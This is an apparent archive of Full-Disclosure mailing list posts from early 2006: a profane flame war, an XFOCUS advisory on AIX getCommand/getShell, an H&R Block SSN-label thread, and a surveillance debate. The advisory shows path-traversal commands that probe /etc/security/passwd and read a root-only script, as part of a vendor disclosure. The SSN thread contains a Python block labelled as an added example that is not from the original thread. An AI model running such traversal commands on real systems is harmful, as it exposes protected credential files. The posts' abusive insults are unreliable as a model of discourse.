Joe Average | 1 Jan 2006 02:26

Re: Important announcement about CXS

And, *What are you?*
 
Regards,
 
CXS
 
On 12/31/05, InfoSecBOFH <infosecbofh <at> gmail.com> wrote:
haha, I know you are what am I....

On 12/31/05, Joe Average < yahooinsider <at> gmail.com> wrote:
> You're the only "fuckbag" we can see right now.
>
> Regards,
>
> CXS
>
>
> On 12/31/05, InfoSecBOFH < infosecbofh <at> gmail.com> wrote:
> >
> > yaaaah!  Good riddance fuckbag.
> >
> > Whats the matter, not getting enough attention so you troll out with
> > this email.  NO ONE CARES if you fuck off.
> >
> > On 12/31/05, Joe Average <yahooinsider <at> gmail.com> wrote:
> > > We're closing up public life as 2006 fast approaches landfall and George W
> > > Bush's iPod gets filled up with tracks, so we're hitting the underworld
> > > again, and bidding everyone a good bye. http://n3td3v.blogspot.com
> > >
> > > [Side nugget]
> > > Bush authorised a missile to strike a suspected compound where they thought
> > > Saddam was living, hours before the planned operations of the Iraq war began
> > > (Do you remember?). It was a strike that would have flattened the compound
> > > and anyone within it, and all the residential homes around it. Saddam wasn't
> > > in that compound, it was found later. The intelligence services were so
> > > convinced he was there, they started the beginning of the war with a strike
> > > against him (to kill, with no body parts to show to the world media).
> > >
> > > However, months after the war had started, they found Saddam hidden in a
> > > hole in the ground? Helped the guy out of the ground, and gave him a health
> > > check, including teeth, and sent him to jail awaiting trial.
> > >
> > > You work out the math.
> > >
> > > U.S.A media bubble forever
> > >
> > > CXS
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

InfoSecBOFH | 1 Jan 2006 07:07

Re: Important announcement about CXS

Pretty much your daddy little bitch.

On 12/31/05, Joe Average <yahooinsider <at> gmail.com> wrote:
> And, *What are you?*
>
> Regards,
>
> CXS
>

Nancy Kramer | 1 Jan 2006 08:17

Re: Important announcement about CXS

Hello,

It is New Year's.  Why can't all of you just have a few drinks and paw a 
person of the gender you are attracted to like normal human beings?

Regards,

Nancy Kramer
Webmaster http://www.americandreamcars.com
Free Color Picture Ads for Collector Cars
One of the Ten Best Places To Buy or Sell a Collector Car on the Web

At 01:07 AM 1/1/2006, InfoSecBOFH wrote:

>Pretty much your daddy little bitch.

crazy frog crazy frog | 1 Jan 2006 09:03

Re: Important announcement about CXS

rofl!!! miss u n3td3v :(

On 12/31/05, Joe Average <yahooinsider <at> gmail.com> wrote:
> We're closing up public life as 2006 fast approaches landfall and George W
> Bush's iPod gets filled up with tracks, so we're hitting the underworld
> again, and bidding everyone a good bye. http://n3td3v.blogspot.com
>
> [Side nugget]
> Bush authorised a missile to strike a suspected compound where they thought
> Saddam was living, hours before the planned operations of the Iraq war began
> (Do you remember?). It was a strike that would have flattened the compound
> and anyone within it, and all the residential homes around it. Saddam wasn't
> in that compound it was found later. The intelligence services were so
> convinced he was there,  they started the beginning of the war with a strike
> against him (to kill, with no body parts to show to the world media).
>
> However, months after the war had started, they found Saddam hidden in a
> hole in the ground? Helped the guy out of the ground, and gave him a health
> check, including teeth, and sent him to jail awaiting trial.
>
> You work out the math.
>
> U.S.A media bubble forever
>
> CXS

--
ting ding ting ding ting ding
ting ding ting ding ding
i m crazy frog :)
"oh yeah oh yeah...
 another wannabe, in hackerland!!!

Eric Sites | 1 Jan 2006 09:08

New WMF exploit confirmed in spam attacks

http://sunbeltblog.blogspot.com/2005/12/new-wmf-exploit-confirmed-in-spam.html

Eric Sites 
VP of Research & Development
Sunbelt Software
eric <at> sunbelt-software.com

XFOCUS Security Team | 1 Jan 2006 09:19

[xfocus-SD-060101]AIX getCommand&getShell two vulnerabilities

Title: [xfocus-SD-060101] AIX getCommand & getShell two vulnerabilities

Affected version: AIX 5.3 ML03. Other versions were not tested,
                  but should also be affected.
Vendor: http://www.ibm.com/
Where: Local

XFOCUS (http://www.xfocus.org) had already discovered
some vulnerabilities in getCommand & getShell.

After applying the newest patch, getCommand & getShell still have two
vulnerabilities, that is:
1: By exploiting this, an attacker can determine whether a file exists,
even one that should not be readable.
2: By exploiting this, an attacker can read, from any shell script
(including files without read permission), the partial content that
follows a cd operation.

Example test:
-bash-3.00$ ./getCommand.new ../../../../../../etc/security/passwd
-bash-3.00$ ./getCommand.new ../../../../../../etc/security/passwd.aa
fopen:  No such file or directory
-bash-3.00$ ls -ld /etc/security/
drwxr-x--- 4 root security 512  2005-12-22 21:09 /etc/security/
-bash-3.00$ ls -l /tmp/k.sh
-rwx------ 1 root system 79 2005-12-22 23:40 /tmp/k.sh
-bash-3.00$ ./getCommand.new ../../../../../tmp/k.sh

ps -ef > /tmp/log. $$
grep test /tmp/log.
$$ rm /tmp/log. $$

-bash-3.00$

TIME LINE:
December 26, 2005 - Initial vendor notification
.....Waiting.....Waiting....
January 1, 2006 - Public disclosure (vendor did not reply)

--EOF

Kind Regards,

---
XFOCUS Security Team
http://www.xfocus.org


Troy Solo | 1 Jan 2006 18:55

H&R Block Tax Service sends mail with SSN on the label.

My wife received this snail mail letter yesterday:

"Recently we mailed you a free copy of our TaxCut software.  We believe 
that this complimentary software will meet your 2006 tax preparation 
needs, based on our prior experience with you as an H&R Block client. 
We hope that you will try TaxCut and find it to be a great solution for 
filing your next tax return.

However, since we sent you this CD, we have become aware of a mail 
production situation that has affected a small percentage of recipients, 
including you.  Due to human error in developing the mailing list, the 
digits of your social security number (SSN) were used as part of your 
mailing label's source code, a string of more than 40 numbers and 
characters.  Fortunately, these digits were embedded in the middle of 
the string, and they were not formatted in any manner that would 
identify them as an SSN.

Nevertheless, we sincerely apologize for this inadvertent error, which 
is completely inconsistent with our strict policies to protect our 
clients' privacy.  Our internal policies limit the use of client SSNs 
for purposes other than tax preparation.  Furthermore, our internal 
procedures require that mailing source codes are formulated in a manner 
that excludes use of any sensitive or confidential information.  Please 
know that we have conducted a thorough internal review of this matter, 
and are taking actions to ensure this does not re-occur.

Again, please understand that the digits of your SSN were embedded in 
the middle of a lengthy source code, and they were not formatted in a 
manner that identifies them as an SSN.  As a result, we believe that 
exposure of your SSN digits was limited to you alone, since you are the 
only person who would recognize their significance.  Nonetheless, we 
suggest that you destroy the wrapper and mailing label of the free 
TaxCut CD we sent you.  If you would like more information about this 
incident, please visit www.taxcut.com/answers, a special Website that 
contains additional details and an e-mail link for contacting us with 
your questions.

On behalf of more than 100,000 associates of H&R Block, allow me to 
apologize for this unfortunate situation.  Through 50 tax seasons, H&R 
Block has earned a reputation as a valued, trustworthy ally to our 
clients, and we sincerely hope that you will find the free TaxCut CD and 
our information packed taxcut.com Website to be helpful tools for the 
2006 tax filing season.

Sincerely,

Tom Allanson
Senior Vice President & General Manager
H&R Block Digital Tax Solutions

4400 Main Street Kansas City, MO 64111
www.taxcut.com"

---------------------------------

The part about "the exposure of the SSN was limited to you alone because 
you are the only person who would recognize your number" kills me.

-- 
/*
/*  Troy Solo
/*  <solo <at> dok.org>
/*  Si Hoc Legere Scis Nimium Eruditionis Habes
/*

Exibar | 1 Jan 2006 19:20

Re: H&R Block Tax Service sends mail with SSN on the label.

"limited to you alone..."  sure, all it takes is for one person to figure
out how many digits into this source code the SSN begins, and there you
go.  Not exactly rocket science there...

  Exibar

----- Original Message ----- 
From: "Troy Solo" <solo <at> dok.org>
To: <full-disclosure <at> lists.grok.org.uk>
Cc: <funsec <at> linuxbox.org>
Sent: Sunday, January 01, 2006 12:55 PM
Subject: [Full-disclosure] H&R Block Tax Service sends mail with SSN on
the label.

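Exibar's point, as an added example (not part of the thread, and not H&R Block's label format or code): with a handful of labels side by side, a fixed-width digit field at a constant offset is recoverable without knowing the layout, and the check the letter says its "internal procedures" require is a short scan over the generated codes rather than over the template. The label layout, the record fields and every 9-digit value below are constructed for the demonstration and are not real SSNs.

```python
"""Fixed-offset 'hidden' digits in a mailing label source code.

Added example; not part of the Full-Disclosure thread and not H&R Block's
label format or code. The layout below is an assumption modelled on the
letter's description (a string of more than 40 characters with the SSN
digits embedded in the middle); all records and 9-digit values are
constructed test data, not real SSNs.
"""

# Constructed records: the "ssn" values are fake test data.
RECORDS = [
    {"seq": 1, "lot": "KQZR", "ssn": "000110001"},
    {"seq": 2, "lot": "MFBW", "ssn": "000220002"},
    {"seq": 3, "lot": "PXHJ", "ssn": "000330003"},
    {"seq": 4, "lot": "RTLN", "ssn": "000440004"},
]


def make_leaky_label_code(rec):
    """Assumed layout: campaign, lot, the SSN digits, sequence, office, check."""
    return f"TC2006-{rec['lot']}-{rec['ssn']}-{rec['seq']:08d}-MO64111-CD01"


def make_safe_label_code(rec):
    """Same layout with the SSN field dropped: the sequence number already
    identifies the record, so no sensitive field is needed in the code."""
    return f"TC2006-{rec['lot']}-{rec['seq']:08d}-MO64111-CD01"


def find_fixed_digit_fields(codes, width):
    """Offsets at which every code carries a run of exactly `width` digits
    bounded by non-digits. Needs no knowledge of the format: with a few
    labels in hand, the 'unformatted' field stands out by position alone."""
    hits = []
    shortest = min(len(c) for c in codes)
    for off in range(shortest - width + 1):
        ok = True
        for c in codes:
            win = c[off:off + width]
            left_ok = off == 0 or not c[off - 1].isdigit()
            right_ok = off + width == len(c) or not c[off + width].isdigit()
            if not (win.isdigit() and left_ok and right_ok):
                ok = False
                break
        if ok:
            hits.append(off)
    return hits


def extract_field(codes, off, width):
    """Pull the field at a recovered offset out of every code."""
    return [c[off:off + width] for c in codes]


def label_leaks_ssn(code, rec):
    """Pre-mailing check on the generated output: does the code contain the
    record's SSN digits, either verbatim or once separators are stripped?
    Stripping separators is deliberately conservative; a false positive on
    a mailing list build is cheap, a miss is not."""
    digits = "".join(ch for ch in code if ch.isdigit())
    return rec["ssn"] in code or rec["ssn"] in digits


if __name__ == "__main__":
    leaky = [make_leaky_label_code(r) for r in RECORDS]
    for off in find_fixed_digit_fields(leaky, 9):
        print(f"9-digit field at offset {off}:", extract_field(leaky, off, 9))
    for rec, code in zip(RECORDS, leaky):
        print(code, "LEAKS" if label_leaks_ssn(code, rec) else "clean")
    for rec in RECORDS:
        code = make_safe_label_code(rec)
        print(code, "LEAKS" if label_leaks_ssn(code, rec) else "clean")
```

The recovery side needs nothing but several labels from the same mailing; the defence side is a check that runs on the rendered codes, because the template looked fine and the SSN came in through the list build.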

'mercy | 1 Jan 2006 16:25

Exploiting Uninitialized Data

Hey,

http://www.felinemenace.org/~mercy/papers/UBehavior/UBehavior.zip - info
on exploiting uninitialized data if anybody is interested.

Greets,
mercy.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

TJ | 2 Jan 2006 04:58

RE: complaints about the government spying! (OFFTOPIC)

"And for most of that time, we seemed to manage with coping without
surrendering our civil liberties"

Yes, we have been overly complacent ... which is why more of us have been /
are being murdered.  It sounds like some have no problem with an endless
string of 9/11-like attacks, both within the US and abroad.  

I can only hope that isn't the case.

And, while I agree this is off-topic for this list - please note that both
sides of this argument are equally guilty of being off-topic.
/TJ
-----Original Message-----
From: full-disclosure-bounces <at> lists.grok.org.uk
[mailto:full-disclosure-bounces <at> lists.grok.org.uk] On Behalf Of
Valdis.Kletnieks <at> vt.edu
Sent: Thursday, December 29, 2005 5:34 PM
To: Paul Schmehl
Cc: full-disclosure <at> lists.grok.org.uk
Subject: Re: [Full-disclosure] complaints about the government spying! 

On Thu, 29 Dec 2005 14:37:44 CST, Paul Schmehl said:

> And the funniest thing of all is that they got stupid Americans all riled 
> about about civil and privacy rights in the process, completely losing 
> track of what's really important - preventing another attack on our soil.

You have this so completely ass-backwards that you obviously have no clue
what this country *used* to stand for.

> Or have you already forgetten that terrorists have been killing us (and 
> many others around the world) since the 1970's without pause? 

And for most of that time, we seemed to manage with coping without
surrendering
our civil liberties.
